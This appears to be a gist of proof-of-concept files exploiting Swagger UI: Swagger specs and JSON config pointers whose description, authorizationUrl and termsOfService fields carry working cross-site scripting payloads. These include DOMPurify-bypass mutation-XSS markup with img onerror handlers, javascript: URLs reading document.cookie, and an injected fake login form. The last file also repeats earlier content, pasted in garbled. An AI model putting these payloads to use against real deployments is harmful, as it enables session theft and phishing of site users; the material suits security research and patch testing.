zenelite123

## test-new.json
{
    "url": "https://gist.githubusercontent.com/zenelite123/f1a52d78b8fe885343cd9ca7e95a6b43/raw/105b3cc569e361741b84369171311323db1a6695/test-new.yaml",
    "urls": [
        {
            "url": "https://gist.githubusercontent.com/zenelite123/f1a52d78b8fe885343cd9ca7e95a6b43/raw/105b3cc569e361741b84369171311323db1a6695/test-new.yaml",
            "name": "Foo"
        }
    ]
}

## test-new.yaml
swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml

## new.yaml

swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: <img onerror=alert() src=1> <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(2) src=1>"></form>
paths:
  /:
    post:
      responses:

## xss.json
{
    "url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml",
    "urls": [
      {
        "url": "https://gist.githubusercontent.com/zenelite123/72274842b61e6abdc0c6a7e4edb62b6f/raw/f436f20513608e8c947d224d8fcb671e2587980a/xss.yaml",
        "name": "Foo"
      }
    ]
  }

## xss.yaml
swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "0.0.1"
  title: DOM XSS PoC
  description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">'
  termsOfService: "javascript:alert(document.cookie)"

## test.json
{
    "url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
    "urls": [
        {
            "url": "https://gist.githubusercontent.com/zenelite123/61360869361ff88d7ce3aec863be7785/raw/227f1d30bb292b1d981b30277236c52acb98ae88/test.yaml",
            "name": "Test"
        }
    ]
}

## test.yaml
swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection : Fake Login</h1>
    </div>
    <div class="form-container">
        <form action="https://example.com/login" method="post" class="form-signin">
	{
	"url": "https://gist.githubusercontent.com/zenelite123/f1a52d78b8fe885343cd9ca7e95a6b43/raw/105b3cc569e361741b84369171311323db1a6695/test-new.yaml",
	"urls": [
	{
	"url": "https://gist.githubusercontent.com/zenelite123/f1a52d78b8fe885343cd9ca7e95a6b43/raw/105b3cc569e361741b84369171311323db1a6695/test-new.yaml",
	"name": "Foo"
	}
	]
	}
	swagger: '2.0'
	info:
	title: Classic API Resource Documentation
	description: \|
	<form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>

	version: production
	basePath: /JSSResource/
	produces:
	- application/xml

	swagger: '2.0'
	info:
	version: 1.0.0
	title: Fake Login Page
	description: <img onerror=alert() src=1> <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(2) src=1>"></form>
	paths:
	/:
	post:
	responses:
	swagger: '2.0'
	securityDefinitions:
	a:
	type: oauth2
	authorizationUrl: javascript:alert(document.domain)//
	info:
	version: "0.0.1"
	title: DOM XSS PoC
	description: '<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(document.cookie) src>">'
	termsOfService: "javascript:alert(document.cookie)"